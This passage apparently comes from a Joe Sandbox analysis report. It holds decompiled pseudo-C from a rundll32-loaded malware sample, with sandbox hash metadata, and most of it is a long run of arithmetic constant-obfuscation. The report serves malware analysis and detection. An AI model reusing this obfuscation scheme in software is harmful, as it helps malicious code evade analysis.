                                                                                                                      				_v12 = _v12 ^ 0x0000b8cd;
                                                                                                                      				E00342D9F(0xb8f00729, 0x289, _t42, 0xa62ab78c);
                                                                                                                      				_t40 = lstrcmpiW(_a12, _a4); // executed
                                                                                                                      				return _t40;
                                                                                                                      			}










                                                                                                                      APIs
                                                                                                                      • lstrcmpiW.KERNELBASE(?,0000B8CD), ref: 0035FD23
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: lstrcmpi
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1586166983-0
                                                                                                                      • Opcode ID: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction ID: d3c195c4912506a27d8d7a4f97cb2a72a48deb3866c2443fca7df0c2752512e7
                                                                                                                      • Opcode Fuzzy Hash: bcaea3a6b408ae5b0ea271ecf45cf18554c4d7f2312cff19f50c51f1dc53bf3d
                                                                                                                      • Instruction Fuzzy Hash: 07010276D00208BFDF05EFE4C84A89EBBB1AB44304F108098E9146A250DBB69B649B40
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E00361B54() {
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v48;
                                                                                                                      				char _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v72;
                                                                                                                      				intOrPtr _v76;
                                                                                                                      				char _v84;
                                                                                                                      				char _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				char _v112;
                                                                                                                      				signed int _v116;
                                                                                                                      				intOrPtr _v120;
                                                                                                                      				char _v128;
                                                                                                                      				char _v136;
                                                                                                                      				char _v140;
                                                                                                                      				char _v144;
                                                                                                                      				char _v148;
                                                                                                                      				char _v152;
                                                                                                                      				signed int _v156;
                                                                                                                      				signed int _v160;
                                                                                                                      				signed int _v164;
                                                                                                                      				signed int _v168;
                                                                                                                      				unsigned int _v172;
                                                                                                                      				signed int _v176;
                                                                                                                      				signed int _v180;
                                                                                                                      				signed int _v184;
                                                                                                                      				signed int _v188;
                                                                                                                      				signed int _v192;
                                                                                                                      				signed int _v196;
                                                                                                                      				signed int _v200;
                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				unsigned int _v216;
                                                                                                                      				unsigned int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				unsigned int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				signed int _v300;
                                                                                                                      				signed int _v304;
                                                                                                                      				signed int _v308;
                                                                                                                      				signed int _v312;
                                                                                                                      				signed int _v316;
                                                                                                                      				signed int _v320;
                                                                                                                      				signed int _v324;
                                                                                                                      				signed int _v328;
                                                                                                                      				signed int _v332;
                                                                                                                      				signed int _v336;
                                                                                                                      				signed int _v340;
                                                                                                                      				signed int _v344;
                                                                                                                      				signed int _v348;
                                                                                                                      				signed int _v352;
                                                                                                                      				signed int _v356;
                                                                                                                      				signed int _v360;
                                                                                                                      				signed int _v364;
                                                                                                                      				signed int _v368;
                                                                                                                      				signed int _v372;
                                                                                                                      				signed int _v376;
                                                                                                                      				signed int _v380;
                                                                                                                      				signed int _v384;
                                                                                                                      				signed int _v388;
                                                                                                                      				signed int _v392;
                                                                                                                      				signed int _v396;
                                                                                                                      				signed int _v400;
                                                                                                                      				signed int _v404;
                                                                                                                      				signed int _v408;
                                                                                                                      				signed int _v412;
                                                                                                                      				signed int _v416;
                                                                                                                      				signed int _v420;
                                                                                                                      				signed int _v424;
                                                                                                                      				signed int _v428;
                                                                                                                      				signed int _v432;
                                                                                                                      				signed int _v436;
                                                                                                                      				signed int _v440;
                                                                                                                      				signed int _v444;
                                                                                                                      				signed int _v448;
                                                                                                                      				signed int _v452;
                                                                                                                      				signed int _v456;
                                                                                                                      				signed int _v460;
                                                                                                                      				signed int _v464;
                                                                                                                      				signed int _v468;
                                                                                                                      				unsigned int _v472;
                                                                                                                      				signed int _v476;
                                                                                                                      				signed int _v480;
                                                                                                                      				signed int _v484;
                                                                                                                      				signed int _v488;
                                                                                                                      				signed int _v492;
                                                                                                                      				signed int _v496;
                                                                                                                      				signed int _v500;
                                                                                                                      				unsigned int _v504;
                                                                                                                      				signed int _v508;
                                                                                                                      				signed int _v512;
                                                                                                                      				signed int _v516;
                                                                                                                      				signed int _v520;
                                                                                                                      				signed int _v524;
                                                                                                                      				signed int _v528;
                                                                                                                      				signed int _v532;
                                                                                                                      				signed int _v536;
                                                                                                                      				signed int _v540;
                                                                                                                      				signed int _v544;
                                                                                                                      				signed int _v548;
                                                                                                                      				signed int _v552;
                                                                                                                      				signed int _v556;
                                                                                                                      				signed int _v560;
                                                                                                                      				signed int _v564;
                                                                                                                      				signed int _v568;
                                                                                                                      				unsigned int _v572;
                                                                                                                      				signed int _v576;
                                                                                                                      				signed int _v580;
                                                                                                                      				unsigned int _v584;
                                                                                                                      				signed int _v588;
                                                                                                                      				signed int _v592;
                                                                                                                      				signed int _v596;
                                                                                                                      				signed int _t1099;
                                                                                                                      				signed int _t1109;
                                                                                                                      				void* _t1121;
                                                                                                                      				signed int _t1139;
                                                                                                                      				signed int _t1147;
                                                                                                                      				signed int _t1167;
                                                                                                                      				void* _t1171;
                                                                                                                      				signed int _t1172;
                                                                                                                      				signed int _t1173;
                                                                                                                      				signed int _t1174;
                                                                                                                      				signed int _t1175;
                                                                                                                      				signed int _t1176;
                                                                                                                      				signed int _t1177;
                                                                                                                      				signed int _t1178;
                                                                                                                      				signed int _t1179;
                                                                                                                      				signed int _t1180;
                                                                                                                      				signed int _t1181;
                                                                                                                      				signed int _t1182;
                                                                                                                      				signed int _t1183;
                                                                                                                      				signed int _t1184;
                                                                                                                      				signed int _t1185;
                                                                                                                      				signed int _t1186;
                                                                                                                      				signed int _t1187;
                                                                                                                      				signed int _t1272;
                                                                                                                      				signed int _t1273;
                                                                                                                      				signed int _t1279;
                                                                                                                      				void* _t1281;
                                                                                                                      				signed int _t1288;
                                                                                                                      				signed int _t1309;
                                                                                                                      				void* _t1311;
                                                                                                                      				void* _t1314;
                                                                                                                      				void* _t1315;
                                                                                                                      				void* _t1316;
                                                                                                                      
                                                                                                                      				_t1311 = (_t1309 & 0xfffffff8) - 0x250;
                                                                                                                      				_v116 = _v116 & 0x00000000;
                                                                                                                      				_v120 = 0xa23e30;
                                                                                                                      				_v592 = 0x3a1cca;
                                                                                                                      				_v592 = _v592 * 0x70;
                                                                                                                      				_t1281 = 0x5cbbc19;
                                                                                                                      				_v592 = _v592 ^ 0x2f3849e0;
                                                                                                                      				_t9 =  &_v592; // 0x2f3849e0
                                                                                                                      				_t1172 = 6;
                                                                                                                      				_v592 =  *_t9 / _t1172;
                                                                                                                      				_v592 = _v592 ^ 0x090e23e8;
                                                                                                                      				_v236 = 0x87b10f;
                                                                                                                      				_v236 = _v236 << 0x10;
                                                                                                                      				_v236 = _v236 ^ 0xb10f0000;
                                                                                                                      				_v516 = 0x461834;
                                                                                                                      				_v516 = _v516 ^ 0x02f635e2;
                                                                                                                      				_t1173 = 0x21;
                                                                                                                      				_v516 = _v516 / _t1173;
                                                                                                                      				_v516 = _v516 | 0x474321ea;
                                                                                                                      				_v516 = _v516 ^ 0x4757fbfb;
                                                                                                                      				_v216 = 0xd2c0b1;
                                                                                                                      				_v216 = _v216 >> 1;
                                                                                                                      				_v216 = _v216 ^ 0x006de7f5;
                                                                                                                      				_v480 = 0xeb5e0b;
                                                                                                                      				_v480 = _v480 + 0xffffa941;
                                                                                                                      				_t1272 = 0x43;
                                                                                                                      				_v480 = _v480 / _t1272;
                                                                                                                      				_v480 = _v480 | 0xc166e67d;
                                                                                                                      				_v480 = _v480 ^ 0xc1675dee;
                                                                                                                      				_v488 = 0xe6f87d;
                                                                                                                      				_v488 = _v488 ^ 0x80ff234c;
                                                                                                                      				_v488 = _v488 ^ 0x24b1b453;
                                                                                                                      				_v488 = _v488 + 0xa7fe;
                                                                                                                      				_v488 = _v488 ^ 0xa4a91779;
                                                                                                                      				_v276 = 0x5f17b9;
                                                                                                                      				_v276 = _v276 << 3;
                                                                                                                      				_v276 = _v276 ^ 0x02fd9db5;
                                                                                                                      				_v344 = 0x4c006c;
                                                                                                                      				_v344 = _v344 >> 0xe;
                                                                                                                      				_v344 = _v344 | 0xcdf796ee;
                                                                                                                      				_v344 = _v344 ^ 0xcdf61224;
                                                                                                                      				_v200 = 0x45df15;
                                                                                                                      				_v200 = _v200 + 0x6060;
                                                                                                                      				_v200 = _v200 ^ 0x004b7917;
                                                                                                                      				_v208 = 0xca7f26;
                                                                                                                      				_v208 = _v208 ^ 0x913d6520;
                                                                                                                      				_v208 = _v208 ^ 0x91fcdbd5;
                                                                                                                      				_v588 = 0xb1f4cb;
                                                                                                                      				_v588 = _v588 + 0x6758;
                                                                                                                      				_t87 =  &_v588; // 0x6758
                                                                                                                      				_v588 =  *_t87 * 0x4f;
                                                                                                                      				_v588 = _v588 ^ 0x925d082a;
                                                                                                                      				_v588 = _v588 ^ 0xa5589431;
                                                                                                                      				_v508 = 0xf7df1e;
                                                                                                                      				_v508 = _v508 + 0xd118;
                                                                                                                      				_v508 = _v508 + 0xffffbf54;
                                                                                                                      				_v508 = _v508 + 0x17fc;
                                                                                                                      				_v508 = _v508 ^ 0x00fe0a31;
                                                                                                                      				_v380 = 0x7e02fb;
                                                                                                                      				_v380 = _v380 + 0xf589;
                                                                                                                      				_v380 = _v380 ^ 0x91d98710;
                                                                                                                      				_v380 = _v380 ^ 0x91abdaf6;
                                                                                                                      				_v504 = 0xb08a0e;
                                                                                                                      				_v504 = _v504 * 0x77;
                                                                                                                      				_t1174 = 0x77;
                                                                                                                      				_v504 = _v504 / _t1174;
                                                                                                                      				_v504 = _v504 >> 2;
                                                                                                                      				_v504 = _v504 ^ 0x002dfbde;
                                                                                                                      				_v372 = 0x813d4a;
                                                                                                                      				_t1175 = 0x6c;
                                                                                                                      				_v372 = _v372 * 0x4a;
                                                                                                                      				_v372 = _v372 / _t1175;
                                                                                                                      				_v372 = _v372 ^ 0x005da134;
                                                                                                                      				_v484 = 0x855e16;
                                                                                                                      				_v484 = _v484 ^ 0xbfb8346c;
                                                                                                                      				_t1176 = 0x5f;
                                                                                                                      				_v484 = _v484 / _t1176;
                                                                                                                      				_v484 = _v484 + 0xfcf8;
                                                                                                                      				_v484 = _v484 ^ 0x02037e81;
                                                                                                                      				_v240 = 0xec674d;
                                                                                                                      				_v240 = _v240 | 0xfc3e6c49;
                                                                                                                      				_v240 = _v240 ^ 0xfcfddb47;
                                                                                                                      				_v364 = 0x61d0f9;
                                                                                                                      				_v364 = _v364 + 0xffffb344;
                                                                                                                      				_v364 = _v364 / _t1272;
                                                                                                                      				_v364 = _v364 ^ 0x000105b5;
                                                                                                                      				_v472 = 0x31ce7b;
                                                                                                                      				_t1177 = 0x51;
                                                                                                                      				_v472 = _v472 * 0x26;
                                                                                                                      				_v472 = _v472 >> 0xc;
                                                                                                                      				_v472 = _v472 >> 3;
                                                                                                                      				_v472 = _v472 ^ 0x0004fff0;
                                                                                                                      				_v224 = 0x9583f6;
                                                                                                                      				_v224 = _v224 / _t1177;
                                                                                                                      				_v224 = _v224 ^ 0x000db43c;
                                                                                                                      				_v324 = 0x1fdef9;
                                                                                                                      				_v324 = _v324 ^ 0xa62571f8;
                                                                                                                      				_v324 = _v324 ^ 0x1b5a0dd0;
                                                                                                                      				_v324 = _v324 ^ 0xbd66a263;
                                                                                                                      				_v232 = 0xd74a0b;
                                                                                                                      				_v232 = _v232 >> 6;
                                                                                                                      				_v232 = _v232 ^ 0x0003c3e3;
                                                                                                                      				_v376 = 0x9dde1e;
                                                                                                                      				_v376 = _v376 << 4;
                                                                                                                      				_v376 = _v376 + 0x9dbb;
                                                                                                                      				_v376 = _v376 ^ 0x09d67643;
                                                                                                                      				_v172 = 0x65dbd5;
                                                                                                                      				_v172 = _v172 >> 0xf;
                                                                                                                      				_v172 = _v172 ^ 0x000c80e9;
                                                                                                                      				_v400 = 0x3c4de1;
                                                                                                                      				_v400 = _v400 ^ 0xf2f914cc;
                                                                                                                      				_t1178 = 0x12;
                                                                                                                      				_v400 = _v400 / _t1178;
                                                                                                                      				_v400 = _v400 ^ 0x0d7ab358;
                                                                                                                      				_v312 = 0x3bea2f;
                                                                                                                      				_t216 =  &_v312; // 0x3bea2f
                                                                                                                      				_t1167 = 0xc;
                                                                                                                      				_v312 =  *_t216 / _t1167;
                                                                                                                      				_v312 = _v312 + 0xffff5e93;
                                                                                                                      				_v312 = _v312 ^ 0x000042d8;
                                                                                                                      				_v392 = 0x83f9ee;
                                                                                                                      				_v392 = _v392 >> 0xb;
                                                                                                                      				_v392 = _v392 * 0x24;
                                                                                                                      				_v392 = _v392 ^ 0x00021c0f;
                                                                                                                      				_v500 = 0x95bd51;
                                                                                                                      				_v500 = _v500 ^ 0x1620baa4;
                                                                                                                      				_v500 = _v500 | 0xd04cbe8c;
                                                                                                                      				_v500 = _v500 * 0x26;
                                                                                                                      				_v500 = _v500 ^ 0xe9af68de;
                                                                                                                      				_v548 = 0x57ee13;
                                                                                                                      				_v548 = _v548 | 0xcfcc72ac;
                                                                                                                      				_v548 = _v548 << 0xe;
                                                                                                                      				_v548 = _v548 + 0x6b2a;
                                                                                                                      				_v548 = _v548 ^ 0xffb12270;
                                                                                                                      				_v300 = 0xa3111e;
                                                                                                                      				_v300 = _v300 + 0xed59;
                                                                                                                      				_v300 = _v300 | 0xdcd78075;
                                                                                                                      				_v300 = _v300 ^ 0xdcf05604;
                                                                                                                      				_v432 = 0xce194f;
                                                                                                                      				_v432 = _v432 ^ 0x23730281;
                                                                                                                      				_v432 = _v432 ^ 0x3635ea1c;
                                                                                                                      				_v432 = _v432 + 0x939b;
                                                                                                                      				_v432 = _v432 ^ 0x1587da76;
                                                                                                                      				_v288 = 0x2cf49d;
                                                                                                                      				_v288 = _v288 << 3;
                                                                                                                      				_v288 = _v288 ^ 0x016df807;
                                                                                                                      				_v584 = 0x20f3bb;
                                                                                                                      				_v584 = _v584 ^ 0x1d2fae62;
                                                                                                                      				_v584 = _v584 ^ 0x98b788a9;
                                                                                                                      				_v584 = _v584 >> 4;
                                                                                                                      				_v584 = _v584 ^ 0x0858582d;
                                                                                                                      				_v464 = 0xcbd192;
                                                                                                                      				_v464 = _v464 * 0x21;
                                                                                                                      				_v464 = _v464 + 0xffff109b;
                                                                                                                      				_v464 = _v464 | 0xd92be105;
                                                                                                                      				_v464 = _v464 ^ 0xdb61e2c2;
                                                                                                                      				_v256 = 0x6d4d8e;
                                                                                                                      				_v256 = _v256 ^ 0x2793e4ee;
                                                                                                                      				_v256 = _v256 ^ 0x27fc61d0;
                                                                                                                      				_v264 = 0x15e89c;
                                                                                                                      				_v264 = _v264 * 0x43;
                                                                                                                      				_v264 = _v264 ^ 0x05baa293;
                                                                                                                      				_v568 = 0x46d03d;
                                                                                                                      				_v568 = _v568 + 0xffffbff8;
                                                                                                                      				_v568 = _v568 << 2;
                                                                                                                      				_v568 = _v568 + 0xffff0322;
                                                                                                                      				_v568 = _v568 ^ 0x011861cf;
                                                                                                                      				_v576 = 0x876e5a;
                                                                                                                      				_v576 = _v576 >> 0x10;
                                                                                                                      				_v576 = _v576 << 2;
                                                                                                                      				_v576 = _v576 << 0xa;
                                                                                                                      				_v576 = _v576 ^ 0x000133c4;
                                                                                                                      				_v552 = 0xa4c770;
                                                                                                                      				_v552 = _v552 + 0x64e6;
                                                                                                                      				_v552 = _v552 + 0xffff80c6;
                                                                                                                      				_v552 = _v552 << 2;
                                                                                                                      				_v552 = _v552 ^ 0x029c8e96;
                                                                                                                      				_v560 = 0x48961c;
                                                                                                                      				_v560 = _v560 * 0x1d;
                                                                                                                      				_v560 = _v560 * 0x3a;
                                                                                                                      				_v560 = _v560 + 0x764e;
                                                                                                                      				_v560 = _v560 ^ 0xdceaabba;
                                                                                                                      				_v412 = 0x2483ba;
                                                                                                                      				_v412 = _v412 * 0x74;
                                                                                                                      				_v412 = _v412 >> 0xa;
                                                                                                                      				_v412 = _v412 ^ 0x000035b1;
                                                                                                                      				_v416 = 0x4a6b09;
                                                                                                                      				_v416 = _v416 >> 8;
                                                                                                                      				_v416 = _v416 * 0x64;
                                                                                                                      				_v416 = _v416 ^ 0x001bf6ce;
                                                                                                                      				_v544 = 0x85ae90;
                                                                                                                      				_v544 = _v544 + 0xffff7005;
                                                                                                                      				_v544 = _v544 + 0x7ae9;
                                                                                                                      				_t1179 = 0x70;
                                                                                                                      				_v544 = _v544 * 0x32;
                                                                                                                      				_v544 = _v544 ^ 0x1a1ce9dc;
                                                                                                                      				_v396 = 0x6298d9;
                                                                                                                      				_v396 = _v396 | 0x50e275a2;
                                                                                                                      				_v396 = _v396 ^ 0x271fbe87;
                                                                                                                      				_v396 = _v396 ^ 0x77f03e33;
                                                                                                                      				_v404 = 0x9d84c7;
                                                                                                                      				_v404 = _v404 ^ 0x3ba1d94b;
                                                                                                                      				_v404 = _v404 | 0x0d5acb53;
                                                                                                                      				_v404 = _v404 ^ 0x3f764d37;
                                                                                                                      				_v528 = 0xd0c26f;
                                                                                                                      				_v528 = _v528 + 0xffffb09d;
                                                                                                                      				_v528 = _v528 << 0xb;
                                                                                                                      				_v528 = _v528 << 4;
                                                                                                                      				_v528 = _v528 ^ 0x398aae1f;
                                                                                                                      				_v388 = 0x32973e;
                                                                                                                      				_v388 = _v388 << 2;
                                                                                                                      				_v388 = _v388 * 0x2a;
                                                                                                                      				_v388 = _v388 ^ 0x213686d9;
                                                                                                                      				_v536 = 0x39ae26;
                                                                                                                      				_v536 = _v536 << 0xf;
                                                                                                                      				_v536 = _v536 << 0xa;
                                                                                                                      				_v536 = _v536 / _t1179;
                                                                                                                      				_v536 = _v536 ^ 0x00ab5ee0;
                                                                                                                      				_v248 = 0x4dbe58;
                                                                                                                      				_v248 = _v248 + 0xffff3c39;
                                                                                                                      				_v248 = _v248 ^ 0x00419814;
                                                                                                                      				_v512 = 0x88f16f;
                                                                                                                      				_v512 = _v512 ^ 0xa76fdbfb;
                                                                                                                      				_v512 = _v512 >> 6;
                                                                                                                      				_v512 = _v512 >> 8;
                                                                                                                      				_v512 = _v512 ^ 0x0003ac5e;
                                                                                                                      				_v520 = 0xecc987;
                                                                                                                      				_v520 = _v520 + 0xffffc052;
                                                                                                                      				_v520 = _v520 + 0xf02b;
                                                                                                                      				_v520 = _v520 >> 1;
                                                                                                                      				_v520 = _v520 ^ 0x007e0ff3;
                                                                                                                      				_v448 = 0xa9e1d5;
                                                                                                                      				_v448 = _v448 >> 4;
                                                                                                                      				_v448 = _v448 * 0x52;
                                                                                                                      				_v448 = _v448 + 0xffff6960;
                                                                                                                      				_v448 = _v448 ^ 0x036fa180;
                                                                                                                      				_v316 = 0x9fe24f;
                                                                                                                      				_v316 = _v316 + 0xa7e4;
                                                                                                                      				_v316 = _v316 + 0xf070;
                                                                                                                      				_v316 = _v316 ^ 0x00a7512c;
                                                                                                                      				_v192 = 0x8e20a3;
                                                                                                                      				_v192 = _v192 | 0xc4ed4dcd;
                                                                                                                      				_v192 = _v192 ^ 0xc4e9d97e;
                                                                                                                      				_v356 = 0x174f56;
                                                                                                                      				_v356 = _v356 << 0x10;
                                                                                                                      				_v356 = _v356 + 0xffffdf01;
                                                                                                                      				_v356 = _v356 ^ 0x4f50aec2;
                                                                                                                      				_v496 = 0xdc9606;
                                                                                                                      				_v496 = _v496 ^ 0x6ace7a56;
                                                                                                                      				_v496 = _v496 * 0x30;
                                                                                                                      				_v496 = _v496 + 0xfffff4e3;
                                                                                                                      				_v496 = _v496 ^ 0xe3827260;
                                                                                                                      				_v332 = 0xa7fb69;
                                                                                                                      				_v332 = _v332 * 0x63;
                                                                                                                      				_v332 = _v332 << 0xe;
                                                                                                                      				_v332 = _v332 ^ 0x8e6ea02b;
                                                                                                                      				_v340 = 0x77d063;
                                                                                                                      				_v340 = _v340 << 0x10;
                                                                                                                      				_v340 = _v340 | 0x739acc9c;
                                                                                                                      				_v340 = _v340 ^ 0xf3f6b748;
                                                                                                                      				_v348 = 0x5928cc;
                                                                                                                      				_v348 = _v348 >> 0xf;
                                                                                                                      				_t1180 = 0x18;
                                                                                                                      				_v348 = _v348 / _t1180;
                                                                                                                      				_v348 = _v348 ^ 0x000e8dd0;
                                                                                                                      				_v580 = 0xc190b9;
                                                                                                                      				_v580 = _v580 | 0xa624a591;
                                                                                                                      				_v580 = _v580 + 0xe71e;
                                                                                                                      				_v580 = _v580 << 7;
                                                                                                                      				_v580 = _v580 ^ 0x734fcbc3;
                                                                                                                      				_v272 = 0x6fe611;
                                                                                                                      				_v272 = _v272 ^ 0xf87d83ea;
                                                                                                                      				_v272 = _v272 ^ 0xf818aed7;
                                                                                                                      				_v572 = 0x6e5414;
                                                                                                                      				_v572 = _v572 >> 1;
                                                                                                                      				_v572 = _v572 + 0xffff4a68;
                                                                                                                      				_v572 = _v572 >> 2;
                                                                                                                      				_v572 = _v572 ^ 0x00016dfd;
                                                                                                                      				_v336 = 0xd3ff38;
                                                                                                                      				_v336 = _v336 + 0x8bfd;
                                                                                                                      				_v336 = _v336 + 0xd3a2;
                                                                                                                      				_v336 = _v336 ^ 0x00d246e6;
                                                                                                                      				_v328 = 0xf94d52;
                                                                                                                      				_t1273 = 0x3e;
                                                                                                                      				_v328 = _v328 / _t1273;
                                                                                                                      				_t1181 = 0x24;
                                                                                                                      				_v328 = _v328 * 0x1d;
                                                                                                                      				_v328 = _v328 ^ 0x00711f28;
                                                                                                                      				_v540 = 0x8f9a1e;
                                                                                                                      				_v540 = _v540 >> 0x10;
                                                                                                                      				_v540 = _v540 / _t1181;
                                                                                                                      				_v540 = _v540 >> 8;
                                                                                                                      				_v540 = _v540 ^ 0x00084c95;
                                                                                                                      				_v204 = 0x67c7c8;
                                                                                                                      				_v204 = _v204 ^ 0xa03849cc;
                                                                                                                      				_v204 = _v204 ^ 0xa0586462;
                                                                                                                      				_v168 = 0xf8e7c3;
                                                                                                                      				_v168 = _v168 >> 0xe;
                                                                                                                      				_v168 = _v168 ^ 0x000525ac;
                                                                                                                      				_v268 = 0x34c26b;
                                                                                                                      				_v268 = _v268 + 0xffff2a86;
                                                                                                                      				_v268 = _v268 ^ 0x0031ec13;
                                                                                                                      				_v444 = 0x3e264e;
                                                                                                                      				_v444 = _v444 + 0xffff5a03;
                                                                                                                      				_v444 = _v444 + 0xffff0530;
                                                                                                                      				_v444 = _v444 / _t1167;
                                                                                                                      				_v444 = _v444 ^ 0x0004d416;
                                                                                                                      				_v408 = 0xc2db9d;
                                                                                                                      				_v408 = _v408 >> 0xa;
                                                                                                                      				_t1182 = 0x45;
                                                                                                                      				_v408 = _v408 * 0x2e;
                                                                                                                      				_v408 = _v408 ^ 0x0003d428;
                                                                                                                      				_v284 = 0xb1ae15;
                                                                                                                      				_v284 = _v284 / _t1182;
                                                                                                                      				_v284 = _v284 ^ 0x76771441;
                                                                                                                      				_v284 = _v284 ^ 0x7674d71a;
                                                                                                                      				_v176 = 0x3bb565;
                                                                                                                      				_v176 = _v176 >> 8;
                                                                                                                      				_v176 = _v176 ^ 0x00099a5e;
                                                                                                                      				_v556 = 0x6a82d;
                                                                                                                      				_v556 = _v556 | 0x5ffe742f;
                                                                                                                      				_v556 = _v556 ^ 0x54ef9d89;
                                                                                                                      				_v556 = _v556 ^ 0x0b1ff9f1;
                                                                                                                      				_v492 = 0xf83eb1;
                                                                                                                      				_v492 = _v492 + 0xffff2212;
                                                                                                                      				_v492 = _v492 ^ 0x7ea721cb;
                                                                                                                      				_v492 = _v492 << 0xe;
                                                                                                                      				_v492 = _v492 ^ 0x104665e9;
                                                                                                                      				_v260 = 0xd66584;
                                                                                                                      				_v260 = _v260 << 0x10;
                                                                                                                      				_v260 = _v260 ^ 0x6587874e;
                                                                                                                      				_v196 = 0x15bb54;
                                                                                                                      				_t1183 = 0x25;
                                                                                                                      				_v196 = _v196 / _t1183;
                                                                                                                      				_v196 = _v196 ^ 0x00053e57;
                                                                                                                      				_v304 = 0x2a83c9;
                                                                                                                      				_v304 = _v304 + 0xffff5d87;
                                                                                                                      				_t1184 = 0x6d;
                                                                                                                      				_v304 = _v304 * 0x67;
                                                                                                                      				_v304 = _v304 ^ 0x10d4d127;
                                                                                                                      				_v368 = 0xeff39c;
                                                                                                                      				_v368 = _v368 ^ 0xf5cbb50f;
                                                                                                                      				_v368 = _v368 * 0x5c;
                                                                                                                      				_v368 = _v368 ^ 0x190e2d63;
                                                                                                                      				_v452 = 0xbc1e04;
                                                                                                                      				_v452 = _v452 << 5;
                                                                                                                      				_v452 = _v452 + 0xffffa111;
                                                                                                                      				_v452 = _v452 * 0x46;
                                                                                                                      				_v452 = _v452 ^ 0x6ded43b0;
                                                                                                                      				_v532 = 0x100915;
                                                                                                                      				_v532 = _v532 << 2;
                                                                                                                      				_v532 = _v532 / _t1184;
                                                                                                                      				_v532 = _v532 | 0x4dc043eb;
                                                                                                                      				_v532 = _v532 ^ 0x4dc2f031;
                                                                                                                      				_v180 = 0x7666bb;
                                                                                                                      				_v180 = _v180 | 0xd9d36c1a;
                                                                                                                      				_v180 = _v180 ^ 0xd9fe02b9;
                                                                                                                      				_v228 = 0x101871;
                                                                                                                      				_v228 = _v228 + 0xfd23;
                                                                                                                      				_v228 = _v228 ^ 0x00150742;
                                                                                                                      				_v320 = 0x576952;
                                                                                                                      				_v320 = _v320 ^ 0x6dcdfa8e;
                                                                                                                      				_v320 = _v320 ^ 0xbcce16b6;
                                                                                                                      				_v320 = _v320 ^ 0xd150af1c;
                                                                                                                      				_v436 = 0x61cf51;
                                                                                                                      				_v436 = _v436 | 0x824da9c6;
                                                                                                                      				_v436 = _v436 << 9;
                                                                                                                      				_t1185 = 0x60;
                                                                                                                      				_v436 = _v436 * 0x49;
                                                                                                                      				_v436 = _v436 ^ 0xb2c360cd;
                                                                                                                      				_v352 = 0xa391d1;
                                                                                                                      				_v352 = _v352 | 0xdcfa9fff;
                                                                                                                      				_v352 = _v352 ^ 0xdcf1f745;
                                                                                                                      				_v564 = 0xf1659a;
                                                                                                                      				_v564 = _v564 + 0xffff5528;
                                                                                                                      				_v564 = _v564 + 0x18ad;
                                                                                                                      				_v564 = _v564 + 0xffffd31e;
                                                                                                                      				_v564 = _v564 ^ 0x00f86590;
                                                                                                                      				_v280 = 0x69bbd1;
                                                                                                                      				_v280 = _v280 | 0xbb53cb0d;
                                                                                                                      				_v280 = _v280 ^ 0xbb7bc9ca;
                                                                                                                      				_v460 = 0x6f67b0;
                                                                                                                      				_v460 = _v460 + 0x36fc;
                                                                                                                      				_v460 = _v460 / _t1185;
                                                                                                                      				_v460 = _v460 ^ 0xf8a19ae6;
                                                                                                                      				_v460 = _v460 ^ 0xf8a43848;
                                                                                                                      				_v384 = 0x580713;
                                                                                                                      				_v384 = _v384 | 0xcbb08146;
                                                                                                                      				_v384 = _v384 ^ 0x925bb18e;
                                                                                                                      				_v384 = _v384 ^ 0x59a45563;
                                                                                                                      				_v164 = 0x5d29b5;
                                                                                                                      				_v164 = _v164 >> 0xa;
                                                                                                                      				_v164 = _v164 ^ 0x00076669;
                                                                                                                      				_v244 = 0x191d5f;
                                                                                                                      				_v244 = _v244 | 0x49e37966;
                                                                                                                      				_v244 = _v244 ^ 0x49fb1589;
                                                                                                                      				_v188 = 0x46d1ad;
                                                                                                                      				_v188 = _v188 + 0x38d0;
                                                                                                                      				_v188 = _v188 ^ 0x00414091;
                                                                                                                      				_v252 = 0x41545b;
                                                                                                                      				_v252 = _v252 + 0xffff6c46;
                                                                                                                      				_v252 = _v252 ^ 0x0041c692;
                                                                                                                      				_v220 = 0xd9c785;
                                                                                                                      				_v220 = _v220 >> 0xc;
                                                                                                                      				_v220 = _v220 ^ 0x000bd8b6;
                                                                                                                      				_v468 = 0x7d74e9;
                                                                                                                      				_v468 = _v468 + 0xffffbc8b;
                                                                                                                      				_v468 = _v468 + 0xfffffc2d;
                                                                                                                      				_t1186 = 0x57;
                                                                                                                      				_v468 = _v468 / _t1186;
                                                                                                                      				_v468 = _v468 ^ 0x0004d984;
                                                                                                                      				_v160 = 0xd5db41;
                                                                                                                      				_v160 = _v160 ^ 0xba014a41;
                                                                                                                      				_v160 = _v160 ^ 0xbad79809;
                                                                                                                      				_v596 = 0x24c82;
                                                                                                                      				_t1187 = 0x61;
                                                                                                                      				_v596 = _v596 * 0x73;
                                                                                                                      				_v596 = _v596 << 3;
                                                                                                                      				_v596 = _v596 * 0x39;
